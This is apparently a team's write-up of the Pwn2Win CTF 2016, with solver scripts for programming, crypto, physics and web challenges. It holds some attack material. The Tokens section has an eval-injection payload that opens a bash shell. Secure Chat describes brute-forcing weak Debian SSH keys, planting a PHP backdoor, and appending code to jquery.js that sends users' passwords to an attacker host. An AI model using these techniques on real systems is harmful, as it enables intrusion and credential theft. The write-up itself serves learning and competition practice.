Pwn2Win CTF 2016 writeup (team scryptos)

1600pts / 3rd

Skycast - Story 10

The flag was writen in the challenge description.
flag: CTF-BR{SKYcast_recebido_e_lido}

Sum (Hello World Platform) - PPC-M 20

This challenge had sample code in Python/Java/C++, so I just ran it and got flag after seconds.
flag: CTF-BR{Congrats!_you_know_how_to_sum!}

Tokens - PyExp 50

Python code injection.

var = raw_input(">>> ") if validation(var): tmp = var.split() cmd = tmp[0] serial = tmp[1] if cmd == "gen": tmp = eval("{" + "cmd" + ":" + serial + "}")

gen __import__('os').system('bash') gives you bash shell, the flag was on the source code.
flag: CTF-BR{Iez4ouf9bah3PungoOshae9eihiegh3ieseEnuGh}

g00d b0y - Bonus 10

2016-03-25 16:28:15 - You are a g00d b0y if you have read what you should have read before the CTF opened ;)

The hint reminded me of /rules, the flag was on the bottom of rule page.
flag: CTF-BR{RTFM_1s_4_g00d_3xpr3ss10n_v2.0}

Square Infinite Spiral - PPC-M 80


#!/usr/bin/env python import ssl, socket from sys import argv from gmpy import * def solve(n): x = sqrt(n) t = n - (x**2) ans_x, ans_y = 0, 0 if x % 2 == 1: s = (x-1) / 2 l = (s+1) * 2 if t == 0: ans_x = s ans_y = -s elif t <= l: ans_x = s + 1 ans_y = -s + (t - 1) else: ans_x = s + 1 - (t - l) ans_y = -s + (l - 1) else: s = x / 2 l = s*2 + 1 if t == 0: ans_x = -s + 1 ans_y = s elif t == 1: ans_x = -s ans_y = s elif t <= l: ans_x = -s ans_y = s - (t - 1) else: ans_x = -s + (t - l) ans_y = s - (l - 1) return ans_x, ans_y class Connect(object): def __init__(self, host, port): self.context = ssl.create_default_context() self.conn = self.context.wrap_socket( socket.socket(socket.AF_INET), server_hostname=host) self.conn.connect((host, port)) self.f = self.conn.makefile('r+b', 0) def __enter__(self): return self.f def __exit__(self, type, value, traceback): self.f.close() with Connect('', 9004) as f: for line in f: line = line.strip() print('received: %s' % line) if line.startswith('CTF-BR{') or \ line == 'WRONG ANSWER': break n = int(line) s = solve(n + 1) f.write('%d %d\n' % (s[0], s[1])) print '.'

flag: CTF-BR{iT-Was-JusT-BIgInteGeR-MFQnQRqKLcSHi}

Sequences - PPC 40

In this challenge we are given a list of index/sequences like belows:

7 - 5 -> 15 -> 45
8 - 24 -> 44 -> 81

What we need to this is to predict n-th number of given sequnce. below’s are a list of sequences that we found out during the CTF:

  1. xn=xn1+d
  2. xn=xn1d
  3. xn=xn1+xn2

There was actually one more type of sequence which was unknown, however running solver script many times (~10 times?) gave me the flag.

#!/usr/bin/env python from pwn import * r = remote('', 1337) answer = [] for i in xrange(15): line = r.recvline().strip() print line seq = map(int, line.replace('>', '').replace(' ', '').split('-')) assert len(seq) == 4 multiplier = seq[2] / seq[1] adder = seq[2] - seq[1] index = seq[0] if seq[2] * multiplier == seq[3]: print 'mul' ans = seq[1] * (multiplier ** (index-1)) elif seq[2] + adder == seq[3]: print 'add' ans = seq[1] + adder * (index-1) elif seq[1] + seq[2] == seq[3]: print 'fib' b1, b2 = seq[3], seq[2] for _ in xrange(3, index): b1, b2 = b1+b2, b1 ans = b1 else: print 'unknown:' exit(0) print 'ans:', ans answer.append(ans) assert r.recvuntil('Results? ') == 'Results? ' ans_str = ','.join(map(str, answer)) print 'sending.. %s' % ans_str r.sendline(ans_str) r.interactive()

flag: CTF-BR{Agor4_j4_pod3m0s_com3c4r_4_br1nc4r_d3_v3rd4d3-by_Skypitain82!\m/}

Sleeper cell - Rev 70

the program looks like:
memcmp(encrypt(input), 'FYM-OI}olte_zi_wdqedd_djrzuj_shgmEDFqo{')
We set a breakpoint on memcpy and bruteforced every chars (by hand!) to find the flag.
flag: CTF-BR{riot_in_public_square_vgzdLIEjd}

V0t3 - Web 65

race condition.
curl '' &; curl ''
flag: CTF-BR{w1n_th3_r4c3}

D3lc1d10 - Steg 25

tel: 3411-1221
flag: CTF-BR{Palacio do Planalto, Praca dos Tres Poderes}

Secure Chat - Web 100

The hint reminded me of CVE-2008-0166. Testing with username carleetos we figured out correct ssh private key.

193s@mbp193s:~/CTF/m/pwn2win/web/securechat$ python ./rsa/2048/ carleetos 22 100

-OpenSSL Debian exploit- by ||WarCat team||
Tested 491 keys | Remaining 32277 keys | Aprox. Speed 98/sec
Tested 910 keys | Remaining 31858 keys | Aprox. Speed 83/sec
Tested 16427 keys | Remaining 16341 keys | Aprox. Speed 12/sec

Key Found in file: 7f97f0867b7db73c8801e46c735a8b85-14980
Execute: ssh -lcarleetos -p22 -i ./rsa/2048//7f97f0867b7db73c8801e46c735a8b85-14980
$ id
uid=1000(carleetos) gid=1000(carleetos) groups=1000(carleetos)

I put backdoor php file onto ./public_html to get shell of www-data.

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Two persons (carleetos, fideleeto) are chatting on this platform. As the challenge description said, what we have to do is to sniff the chat.

-rw-r----- 1 root     www-data  4953 Jan 10 10:42 base64.js
-rw-r----- 1 root     www-data  3210 Jan 10 10:42 bluewhite.css
-rw-r----- 1 root     www-data 19841 Jan 10 10:42 curve25519.js
drwxr-x--- 2 www-data www-data  4096 Mar 27 03:27 db
-rw-r----- 1 root     www-data    74 Jan 10 10:42 db.sql.forbid
-rw-r----- 1 root     www-data  2259 Jan 10 10:42 horde-power1.png
-rw-r----- 1 root     www-data  7885 Jan 10 10:42 index.php
-rw-rw---- 1 root     www-data 57254 Mar 27 03:21 jquery.js
-rw-r--r-- 1 root     root     57254 Jan 16 20:14 jquery.js~
-rw-r----- 1 root     www-data 45333 Jan 10 10:42 jscrypto.js
-rw-r----- 1 root     www-data   505 Jan 10 10:42 locked.png
-rw-r----- 1 root     www-data  1450 Jan 10 10:42 login.php
-rw-r----- 1 root     www-data 10386 Jan 16 19:37 mailbox.php
-rw-r----- 1 root     www-data 15828 Jan 10 10:42 screen.css
-rw-r----- 1 root     www-data  7939 Jan 10 10:42 sha512.js
-rw-r----- 1 root     www-data 25092 Jan 10 12:28 sjcl.js
-rw-r----- 1 root     www-data   649 Jan 10 15:18 users

We figured out that jquery.js was writable. Putting malicious code onto it, we got plain passwords for carleetos/fideleeto.

echo '$.post = function(x){$.get("http://HOST/leak?"+$("#pass").val());};' >> /var/www/html/webmail/jquery.js - - [27/Mar/2016:17:00:04 +0900] "OPTIONS /leak?~]4mts-[gK*4C HTTP/1.1" 405 574 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36" - - [27/Mar/2016:17:00:04 +0900] "OPTIONS /leak?%7CAAzg:-z-i@%7D9,=Cc%3Ce%5C HTTP/1.1" 405 574 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36"

The flag was found after logging in.

flag: CTF-BR{+55(13)31485521}

Access Code - Net 100

For this challenge you connect to a remote port and are given status updates as a process runs in the background. While connected the server will connect back to you on port 1110/tcp and send a “control packet”. This packet will contain an operation (“xor” or “mod”) and an integer. e.g. "xor 221"
Stage 2 then begins, the server connects back to your IP on a random range of ports 100 - 500. Then asks you for the 'Code?'
If you take the TCP destination port of each of the random stage 2 packets, perform the control packet operation on the port numbers then concatenate the result such as:

Control Packet: mod 221
Ports: 201, 294, 295, 300
Result: 221737479

Prefix the result with “Code” and submit:
Response: Code221737479

You will then receive the flag.
flag: CTF-BR{Authentication_H4rdc0r3_FTW}

QRGrams - PPC 60

This was purely a programming challenge with straightforward solution. You connect to a server and receive a long string of QR codes in various formats and sizes and then are asked a “Phrase?”

Taking the QR codes, converting them into a computer recognizable format and then recovering the Phrase is the challenge here. Using python the QR code recovery is possible by converting the ASCII QR image into PNG you can then use a QR decoder tool on the PNG images. When you do you recover a “jumbled” phrase such as:

QR Code output: irPxa si tno botua ou,pmecsrt 'its uaotb el.pope 10 36

The unjumbled string would be: Pixar is not about computers, it’s about people.

There are two additional integers appended on the end also which we simply appended in order because we did not see the significance of those.

To solve this we took a word descrambling tool and an english dictionary. The challenge gave very little time to respond to the challenge so we could not manually verify the result in time. So instead, we looped the program until we received a phrase we could unjumble correctly.

The script submits the unjumbled phrase and we are awarded with the flag.
flag: CTF-BR{QRgramas_are_the_new_wave_of_codes,_dude!}

Electronic Ballot Box - Elet 50

For this challenge we’re given 4 blurry JPGs of an electronic circuit comprising of various 7400 series logic chips. The diagram describes the type of logic chips and each’s inputs/output pins.

There is a C source code describing the controller logic that sets the pin values of the 7400 chips either low or high based on what two keys on a keypad a processVoter enters.

The Psuedocode of the program is as below:

InitCircuit() {

mainLoop {

	waitForKeypress {
			if twoKeysPressed {
				if keysPressed(1,3) processprocessVote('pt')
				if keysPressed(1,6) processprocessVote('pstu')
				if keysPressed(2,0) processVote('psc')
				if keysPressed(2,1) processVote('pcb')
				if keysPressed(2,7) processVote('psdc')
				if keysPressed(2,8) processVote('prtb')
				if keysPressed(2,9) processVote('pco')
				if keysPressed(4,0) processVote('psb')
				if keysPressed(4,3) processVote('pv')
				if keysPressed(4,5) processVote('psdb')
				if keysPressed(5,0) processVote('psol')


processVote(vote) {
		if vote == 'pt' 
			manipulateResultPins((23,-1), (27,+1), (29,-1))
		if vote == 'pstu' 
			manipulateResultPins((9,+1), (23,-1), (27,+1), (29,-1))
		... and so on for each "candidate?"

Our idea to solve this would be based on the fact that each input/output has 8 bits. If we design a program that emulates the logic of the circuit, then feed the inputs and read the outputs we might have a solution.

#!/usr/bin/python # result manipulation dictionary # -1 means this pins value is manipulated by -1 # 0 means this pins value is not manipulated # 1 means this pins value is manipulated by +1 votestats = { 'pt': [0,-1,1,-1], 'pstu': [1,-1,1,-1], 'psc': [0,-1,0,0], 'pcb': [1,-1,0,0], 'psdc': [0,-1,0,-1], 'prtb': [0,-1,0,0], 'pco': [1,-1,0,-1], 'psb': [0,0,1,0], 'pv': [1,-1,0,-1], 'psdb': [0,-1,0,0], 'psol': [0, 0,0,-1]} # candidates possiblevotes = ['pt','pstu','psc','pcb','psdc','prtb','pco','psb','pv','psdb','psol'] def notgate(input): return not input for vote in possiblevotes: # Pin states - set them all to the most common state # Pin names refer to the circuit diagram JPG pin = { 2 : 1, 3 : 0, 4 : 1, 5 : 0, 6 : 1, 7 : 0, 8 : 0, 22 : 0, 23 : 0, 24 : 1, 25 : 0, 26 : 0, 27 : 0, 28 : 1} # store the outputs of the 7400 ics output = [0 for x in range(21)] # the pin states are set based on keypad presses # 2 keys are pressed, then the logic sets these states # pt is default case so its not needed here if vote == 'pstu': pin[24] = 0 pin[28] = 1 elif vote == 'psc': pin[4] = 0 pin[22] = 1 pin[24] = 0 pin[26] = 1 pin[28] = 0 elif vote == 'pcb': pin[22] = 1 pin[26] = 1 elif vote == 'psdc': pin[22] = 1 pin[28] = 0 elif vote == 'prtb': pin[8] = 1 pin[26] = 1 elif vote == 'pco': pin[26] = 1 pin[28] = 0 elif vote == 'psb': pin[6] = 0 elif vote == 'pv': pin[28] = 0 elif vote == 'psdb': pin[8] = 1 pin[24] = 0 pin[26] = 1 elif vote == 'psol': pin[8] = 1 pin[26] = 1 pin[28] = 0 # compute the logic as a series of logic operations to # simulate the 20 x 7400 series logic chips in the circuit output[1] = pin[2] output[2] = not(not(output[1] and output[1]) and output[1]) output[3] = not output[2] output[4] = not(not(output[3] and output[3]) and not(output[3] and output[3])) pin[3] = int(output[4]) output[5] = not(output[4] or pin[4]) output[6] = not(not(output[5] and output[5]) and output[5]) output[7] = not(not(output[6] and 1) and not(output[6] and 1)) output[8] = (output[7] or 0) or 0 pin[5] = int(output[8]) output[10] = not(not(1 or pin[6]) or pin[6]) output[12] = not(pin[8] or not(pin[8])) or 0 # for this pin, sometimes we manipulate it :) pin[9] = int(output[12]) + votestats[vote][0] output[13] = not(not(pin[22] and output[12]) and 0) output[14] = (output[13] or 0) or 0 # for this pin, sometimes we manipulate it :) pin[23] = int(output[14]) + votestats[vote][1] output[15] = (pin[24] or 0) or 0 pin[25] = int(output[15]) output[16] = not(not(pin[26] and 1) and 0) output[17] = not(output[16] or 0) # for this pin, sometimes we manipulate it :) pin[27] = int(output[17]) + votestats[vote][2] output[18] = not pin[28] output[19] = not(not(output[18] or 0) or 0) output[20] = not(output[19] and 0) # for this pin, sometimes we manipulate it :) pin[29] = int(output[20]) + votestats[vote][3] output = map(int, output) letter = "" for p in pin.keys(): if p % 2 != 0: letter += str(pin[p]) print chr(int(letter,2)), print


RSA Signature - Crypto 200

Solution: Verify(Sign(2), 2)

from scryptos import * m = int("Implementing RSA based signature is so difficult to be broken".encode("hex"), 16) def verify(x, y): p = Tube(host="", port=31229) p.read_until(";") p.write("%s:%s;" % (format(x, "b"), format(y, "b"))) return def sign(x): p1 = Tube(host="", port=31228) p1.read_until(";") p1.write("%s;" % format(x, "b")) return int(, 2) sig = sign(2) print verify(2, sig)

umm, Challenge was buggy? well, I got flag haha

Flag is CTF-BR{malle4bitly_is_a_property_so_be4utiful_and_d4ngerous}

Death Sequence - PPC 100

#!/usr/bin/env ruby #coding:ascii-8bit require "matrix" require_relative "../../pwnlib" # # run commands below before running this script # $ echo '#!/bin/bash' > # $ echo 'openssl s_client -connect' >> # $ chmod +x # $ socat tcp-listen:54321,fork,reuseaddr exec:./ MOD = 10 ** 20 def mod(a, m) n = [] for i in 0...a.row_size n << [] for j in 0...a.row_size if a[i, j] >= 0 n[-1] << a[i, j] % MOD else n[-1] << a[i, j] % MOD end end end Matrix.rows(n) end def pow(a, n) b = Matrix.I(a.row_size) while n > 0 if n % 2 == 1 b = mod(b * a, MOD) end a = mod(a * a, MOD) n >>= 1 end return b end def get_nth_number(n) # A_n = 4*A_{n-1} + 3*A_{n-2} + 2*A_{n-3} + 1*A_{n-4} v = Vector[1, 1, 1, 1] a = Matrix.rows([[4, 3, 2, 1], [1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0]]) (pow(a, n) * v)[-1] end def get_nth_sum(n) # S_n = 5*S_{n-1} - S_{n-2} - S_{n-3} - S_{n-4} - S_{n-5} v = Vector[14, 4, 3, 2, 1] a = Matrix.rows([[5, -1, -1, -1, -1], [1, 0, 0, 0, 0], [0, 1, 0, 0, 0], [0, 0, 1, 0, 0], [0, 0, 0, 1, 0]]) (pow(a, n) * v)[-1] end"localhost", 54321){|tube| tube.recv_until("certificate)\n---\n") while true s = tube.recv_until("\n") if s.include?("CTF-BR{") puts s break end n = s.to_i puts "n = #{n}" nth = get_nth_number(n - 1).to_s[-9..-1] sum = get_nth_sum(n - 1).to_s[-9..-1] puts "nth = #{nth} sum = #{sum}" tube.sendline("#{nth} #{sum}") end }

flag: CTF-BR{It-wAs-jUsT-a-ReCURsIVe-SequenCE-to-BE-coded-In-LOGN-XwmIBVyZ5QEC}

Drone Fail - phy 40

First, we calculate gravitational acceleration g with


(note R is in kilometers, so we convert it to meters)

then, let V = velocity in m/s of the jump, t=D/v (the total duration of running and jumping), and T = duration in seconds from the jump to contact with module,


will hold. From this, we can get a quadratic equation regarding T,


T must be a real number so


The minimum V where this equation holds is when


#!/usr/bin/env python import math from subprocess import * cmd = "openssl s_client -quiet -connect" p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE) while True: s = p.stdout.readline() print(s) G = 6.6740831e-11 M = 5.9726e24 D, a, R, v = map(float, s.strip().split(' ')) g = G*M/((R*1000)**2) t = D / v print "D = %f" % D print "a = %f" % a print "R = %f" % R print "v = %f" % v print "g = %f" % g print "t = %f" % t v_min = (g * a)**0.5 * t ans = "%.2f\n" % round(v_min,2) print(ans) p.stdin.write(ans)

flag: CTF-BR{iT-WaS-jUsT-lAuNch-oBLIqUe-with-GRAVity-W0T6Kmu77}

Give Feedback - Bonus 25

give it 5 stars!
flag: CTF-BR{Thank_you_for_attending_the_pwn2win_party}